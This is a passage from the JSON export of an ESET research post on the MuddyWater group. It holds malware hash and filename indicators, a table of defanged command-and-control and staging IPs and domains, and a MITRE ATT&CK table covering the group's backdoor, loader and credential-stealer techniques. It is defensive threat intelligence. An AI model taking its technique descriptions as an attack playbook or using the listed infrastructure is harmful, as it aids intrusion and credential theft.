width=\"132\"><span>bd34a33f5bJeJOf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>87ADD79C7C8335447113<wbr><\/wbr>EE0D413F52AE2B17F066<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>93055115559219BE8441<wbr><\/wbr>880597C533381B99213B<\/span><\/td>\n<td width=\"132\"><span>main<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>97C3376AB551E899F347<wbr><\/wbr>CC9DDF49EA01DB2D7903<\/span><\/td>\n<td width=\"132\"><span>504f53ca8esoLmG<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>99FAD0862E2E8D363F3E<wbr><\/wbr>18952FD92E09493CC27D<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A101CBCCD950AA36FC3B<wbr><\/wbr>40C3C331FDE43ACDBBD2<\/span><\/td>\n<td width=\"132\"><span>66f3e097e4tnyHR<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A227C0A4425E24268B75<wbr><\/wbr>9A740231676A589CA4E6<\/span><\/td>\n<td width=\"132\"><span>fa54125dc8ZpaNJ<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A997A7AAE727D2C12CCE<wbr><\/wbr>80FE3607317775A4DF3E<\/span><\/td>\n<td width=\"132\"><span>fa54125dc8ZpaNJ<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B0271CA76052EC340014<wbr><\/wbr>D7BCCDBD69325A4E60F2<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fAzMZI<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B0CD4F5DF192BFFE6500<wbr><\/wbr>E44B80C28505DFD9CA66<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B16E7D56A8DC0FF6B3AF<wbr><\/wbr>D797E1EAB22B20DFFB39<\/span><\/td>\n<td width=\"132\"><span>ESETGO<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D49979D0063B28BD7339<wbr><\/wbr>0481E6AE642C00CE0791<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D518F5C648AB64B390A2<wbr><\/wbr>9AA2858219318CFC556A<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bHOVby<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>DF223D653F761ED55F9C<wbr><\/wbr>0774F1DBF545FD741F86<\/span><\/td>\n<td width=\"132\"><span>66f3e097e4tnyHR<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>DF8FC5213AA11EE445EA<wbr><\/wbr>D1AAE17A826E7D51A743<\/span><\/td>\n<td width=\"132\"><span>Revoke.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>E02DD79A8CAED662969F<wbr><\/wbr>6D5D0792F2CB283116E8<\/span><\/td>\n<td width=\"132\"><span>66f3e097e4tnyHR<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>E8F4EA3857EF5FDFEC1A<wbr><\/wbr>2063D707609251F207DB<\/span><\/td>\n<td width=\"132\"><span>main<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>F26CAE9E79871DF3A47F<wbr><\/wbr>A61A755DC028C18451FC<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fAzMZI<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>FF09608790077E1BA52C<wbr><\/wbr>03D9390E0805189ADAD7<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A9747A3F58F8F408FECE<wbr><\/wbr>FC48DB0A18A1CB6DACAE<\/span><\/td>\n<td width=\"132\"><span>AppVs<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"104\"><strong>Domain<\/strong><\/td>\n<td width=\"142\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"161\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>3.95.7[.]142<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">Amazon Data Services NoVa<\/td>\n<td width=\"85\">2024\u201109\u201108<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>35.175.224[.]64<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">Amazon Technologies Inc.<\/td>\n<td width=\"85\">2024\u201110\u201110<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>51.16.209[.]105<\/span><\/td>\n<td width=\"104\"><span>api.tikavod<wbr><\/wbr>ot.co[.]il<\/span><\/td>\n<td width=\"142\">Amazon Data Services Ireland Technical Role Account<\/td>\n<td width=\"85\">2024\u201109\u201115<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>62.106.66[.]112<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">RIPE-NCC-HM-MNT, ORG-NCC1-RIPE<\/td>\n<td width=\"85\">2024\u201109\u201129<\/td>\n<td width=\"161\">MuddyWater staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>157.20.182[.]45<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">Hosterdaddy Private Limited<\/td>\n<td width=\"85\">2024\u201104\u201118<\/td>\n<td width=\"161\">MuddyWater staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>161.35.172[.]55<\/span><\/td>\n<td width=\"104\">N\/A <\/td>\n<td width=\"142\">DigitalOcean, LLC<\/td>\n<td width=\"85\">2022\u201111\u201112<\/td>\n<td width=\"161\">MuddyWater staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>167.99.224[.]13<\/span><\/td>\n<td width=\"104\"><span>magically<wbr><\/wbr>day[.]com<\/span><\/td>\n<td width=\"142\">DigitalOcean, LLC<\/td>\n<td width=\"85\">2022\u201111\u201106<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>194.11.246[.]78<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">HosterDaddy Private Limited<\/td>\n<td width=\"85\">2024\u201107\u201123<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>194.11.246[.]101<\/span><\/td>\n<td width=\"104\"><span>processplan<wbr><\/wbr>et[.]org<\/span><\/td>\n<td width=\"142\">Administrator<\/td>\n<td width=\"85\">2024\u201108\u201127<\/td>\n<td width=\"161\">MuddyWater staging and C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>206.71.149[.]51<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2023\u201110\u201130<\/td>\n<td width=\"161\">MuddyWater staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>212.232.22[.]136<\/span><\/td>\n<td width=\"104\">N\/A<\/td>\n<td width=\"142\">HosterDaddy Private Limited<\/td>\n<td width=\"85\">2025\u201101\u201116<\/td>\n<td width=\"161\">MuddyWater C&amp;C server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 17<\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td><strong>Tactic<\/strong><\/td>\n<td><strong>ID<\/strong><\/td>\n<td><strong>Name<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><strong>Reconnaissance<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1591\"><em>T1591<\/em><\/a><\/td>\n<td>Gather Victim Org Information<\/td>\n<td>MuddyWater gathers victim org info to use in spearphishing emails.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\"><strong>Resource Development<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\"><em>T1583<\/em><\/a><\/td>\n<td>Acquire Infrastructure<\/td>\n<td>MuddyWater uses acquired infrastructure to host malware download locations and C&amp;C servers.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\"><em>T1608<\/em><\/a><\/td>\n<td>Stage Capabilities<\/td>\n<td>MuddyWater stages tools like RMM tools and data stealers on file-hosting sites such as OneHub and Mega Limited.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1587\/001\"><em>T1587.001<\/em><\/a><\/td>\n<td>Develop Capabilities: Malware<\/td>\n<td>MuddyWater develops backdoors like MuddyViper and tools such as the Fooder loader, LP-Notes credential stealer, and the Blub and CE-Notes browser-data stealers.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1588\/002\"><em>T1588.002<\/em><\/a><\/td>\n<td>Obtain Capabilities: Tool<\/td>\n<td>MuddyWater uses publicly available tools from GitHub, such as <a href=\"https:\/\/github.com\/moonD4rk\/HackBrowserData\">HackBrowserData<\/a> and Go-based reverse proxies.<\/td>\n<\/tr>\n<tr>\n<td><strong>Initial Access<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1566\/002\"><em>T1566.002<\/em><\/a><\/td>\n<td>Phishing: Spearphishing Link<\/td>\n<td>MuddyWater uses spearphishing emails with links to file hosting sites like OneHub and Mega Limited to host RMM software (Atera, Level, and PDQ).<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"5\"><strong>Execution<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/001\"><em>T1059.001<\/em><\/a><\/td>\n<td>Command-Line Interface: PowerShell<\/td>\n<td>MuddyViper has the capability to open and execute PowerShell scripts.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/003\"><em>T1059.003<\/em><\/a><\/td>\n<td>Command-Line Interface: Windows Command Shell<\/td>\n<td>MuddyViper has the capability to offer the Windows Command shell as a reverse shell.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1559\/001\"><em>T1559.001<\/em><\/a><\/td>\n<td>Inter-Process Communication: Component Object Model<\/td>\n<td>MuddyViper uses the <span>ITaskService<\/span> COM object to create a scheduled task for persistence.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1106\"><em>T1106<\/em><\/a><\/td>\n<td>Native API<\/td>\n<td>MuddyViper uses the <span>CreateProcess<\/span> API to execute additional files and commands.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1204\/001\"><em>T1204.001<\/em><\/a><\/td>\n<td>User Execution: Malicious Link<\/td>\n<td>MuddyWater operators rely on targets clicking malicious links delivered through spearphishing.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\"><strong>Persistence<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1547\/001\"><em>T1547.001<\/em><\/a><\/td>\n<td>Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder<\/td>\n<td>MuddyViper has the capability to copy itself to the victim\u2019s Startup folder.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1543\/003\"><em>T1543.003<\/em><\/a><\/td>\n<td>Create or Modify System Process: Windows Service<\/td>\n<td>MuddyWater operators attempt to install RMM tools in <span>%PROGRAMFILES%<\/span>, which also includes creating a Windows service set to autostart.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1053\"><em>T1053<\/em><\/a><\/td>\n<td>Scheduled Task\/Job<\/td>\n<td>MuddyViper can be persisted as a scheduled task named <span>ManageOnDriveUpdater<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"14\"><strong>Defense Evasion<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1134\/001\"><em>T1134.001<\/em><\/a><\/td>\n<td>Access Token Manipulation: Token Impersonation\/Theft<\/td>\n<td>The LP-Notes and CE-Notes tools attempt to impersonate a logged-on user\u2019s security context via ImpersonateLoggedOnUser.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1140\"><em>T1140<\/em><\/a>\n<\/td>\n<td>Deobfuscate\/Decode Files or Information<\/td>\n<td>Blub uses string obfuscation for storing stolen data.<br \/>Fooder can extract embedded, AES-encrypted payloads.<br \/>CE-Notes and LP-Notes both use a custom byte-wise decryption routine to decrypt strings.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1620\"><em>T1620<\/em><\/a><\/td>\n<td>Reflective Code Loading<\/td>\n<td>The Fooder loader performs reflective code loading to run additional tools (MuddyViper, reverse tunnels, and HackingBrowserData).<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1497\/003\"><em>T1497.003<\/em><\/a><\/td>\n<td>Virtualization\/Sandbox Evasion: Time Based Evasion<\/td>\n<td>MuddyViper uses many calls to a sleep function to detect and avoid virtualization and analysis environments, and generally to inhibit dynamic analysis.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/007\"><em>T1027.007<\/em><\/a><\/td>\n<td>Obfuscated Files or Information: Dynamic API Resolution<\/td>\n<td>CE-Notes and LP-Notes perform dynamic API resolution by decrypting strings at runtime.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1134\/002\"><em>T1134.002<\/em><\/a><\/td>\n<td>Access Token Manipulation: Create Process with Token <\/td>\n<td>Fooder\u2019s launcher attempts to duplicate the token of a process specified by the operator when launching Fooder via <span>CreateProcessAsUserA<\/span>.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1622\"><em>T1622<\/em><\/a><\/td>\n<td>Debugger Evasion <\/td>\n<td>MuddyViper searches for specific debugging tools, adjusting its behavior accordingly.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1070\/009\"><em>T1070.009<\/em><\/a><\/td>\n<td>Indicator Removal: Clear Persistence<\/td>\n<td>MuddyViper can modify registry keys used for persistence, if instructed to uninstall itself.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1070\/004\"><em>T1070.004<\/em><\/a><\/td>\n<td>Indicator Removal: File Deletion<\/td>\n<td>MuddyViper can delete itself from the system, if instructed to uninstall itself.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1036\"><em>T1036<\/em><\/a><\/td>\n<td>Masquerading<\/td>\n<td>Some versions of Fooder masquerade as an innocuous Snake game.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1036\/004\"><em>T1036.004<\/em><\/a><\/td>\n<td>Masquerading: Masquerade Task or Service<\/td>\n<td>MuddyViper can create a task named <span>ManageOnDriveUpdater<\/span>.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1112\"><em>T1112<\/em><\/a><\/td>\n<td>Modify Registry<\/td>\n<td>MuddyViper can modify the <span>HKCUSoftwareMicrosoftWindowsCurrentVe<wbr><\/wbr>rsionExplorerUser Shell FoldersStartup<\/span> and <span>HKCUSoftwareMicrosoftWindowsCurrentVe<wbr><\/wbr>rsionExplorerShell FoldersStartup<\/span> registry keys, to change the location of the Startup folder.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/009\"><em>T1027.009<\/em><\/a><\/td>\n<td>Obfuscated Files or Information: Embedded Payloads<\/td>\n<td>Fooder can extract an embedded, AES-encrypted payload.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/013\"><em>T1027.013<\/em><\/a><\/td>\n<td>Obfuscated Files or Information: Encrypted\/Encoded File<\/td>\n<td>Fooder can extract an embedded, AES-encrypted payload.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Credential Access<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1555\/003\"><em>T1555.003<\/em><\/a><\/td>\n<td>Credentials from Password Stores: Credentials from Web Browsers<\/td>\n<td>CE-Notes and Blub attempt to steal credentials stored in browsers.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1056\/002\"><em>T1056.002<\/em><\/a>\n<\/td>\n<td>Input Capture: GUI Input Capture<\/td>\n<td>MuddyViper and LP-Notes have the ability to display a Windows security login prompt to capture login credentials and confirm the credentials\u2019 veracity by relaying those credentials to legitimate Windows APIs.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Discovery<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1082\"><em>T1082<\/em><\/a>\n<\/td>\n<td>System Information Discovery<\/td>\n<td>MuddyViper collects system information from compromised systems and reports it back to the C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1518\/001\"><em>T1518.001<\/em><\/a><\/td>\n<td>Software Discovery: Security Software Discovery<\/td>\n<td>MuddyViper attempts to get a process list of running applications, looks for security-related processes and, if found, reports them to the C&amp;C server and modifies its behavior.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Collection<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1074\/001\"><em>T1074.001<\/em><\/a><\/td>\n<td>Data Staged: Local Data Staging<\/td>\n<td>Blub, CE-Notes, and LP-Notes stage stolen credentials on disk for MuddyViper, reverse tunnels, or RMM tools to collect and exfiltrate.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1560\/001\"><em>T1560.001<\/em><\/a>\n<\/td>\n<td>Archive Collected Data: Archive via Utility<\/td>\n<td>MuddyViper uses PowerShell\u2019s <span>Compress-Archive<\/span> command to compress browser data collected via the HackBrowserData utility.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"6\"><strong>Command and Control<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1573\/001\"><em>T1573.001<\/em><\/a><\/td>\n<td>Encrypted Channel: Symmetric Cryptography<\/td>\n<td>MuddyViper uses AES-CBC encryption to encrypt data before exchanging data with the C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1219\"><em>T1219<\/em><\/a><\/td>\n<td>Remote Access Software<\/td>\n<td>MuddyWater use Atera, Level, and PDQ RMM tools for remote access to victims\u2019 systems.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1071\/001\"><em>T1071.001<\/em><\/a><\/td>\n<td>Application Layer Protocol: Web Protocols<\/td>\n<td>MuddyViper uses HTTPS for C&amp;C communications. The reverse tunnels use a mixture of HTTP and HTTPS for C&amp;C communications.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1105\"><em>T1105<\/em><\/a><\/td>\n<td>Ingress Tool Transfer<\/td>\n<td>MuddyViper has the capability to download additional payloads from its C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1001\"><em>T1001<\/em><\/a><\/td>\n<td>Data Obfuscation<\/td>\n<td>MuddyViper leverages HTTPS for C&amp;C communications, using the <span>Status<\/span> header to hide a backdoor command ID in the server-to-client direction of the communication.<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1090\"><em>T1090<\/em><\/a><\/td>\n<td>Proxy<\/td>\n<td>MuddyWater uses customized versions of go\u2011socks5 reverse proxy tools.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\"><strong>Exfiltration<\/strong><\/td>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1041\"><em>T1041<\/em><\/a><\/td>\n<td>Exfiltration Over C2 Channel<\/td>\n<td>MuddyWater tools exfiltrate data to C&amp;C servers using C&amp;C channels (HTTP and HTTPS).<\/td>\n<\/tr>\n<tr>\n<td><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1030\"><em>T1030<\/em><\/a><\/td>\n<td>Data Transfer Size Limits<\/td>\n<td>MuddyViper supports downloading\/\u200cuploading files in chunks of limited size.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=muddywater-snakes-riverbank&amp;sfdccampaignid=7011n0000017htTAAQ\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/muddywater-snakes-riverbank\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook<\/p>\n","protected":false},"author":5,"featured_media":9054,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2878],"tags":[],"class_list":["post-9053","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eset-research"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/9053","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/comments?post=9053"}],"version-history":[{"count":1,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/9053\/revisions"}],"predecessor-version":[{"id":9816,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/9053\/revisions\/9816"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media\/9054"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media?parent=9053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/categories?post=9053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/tags?post=9053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}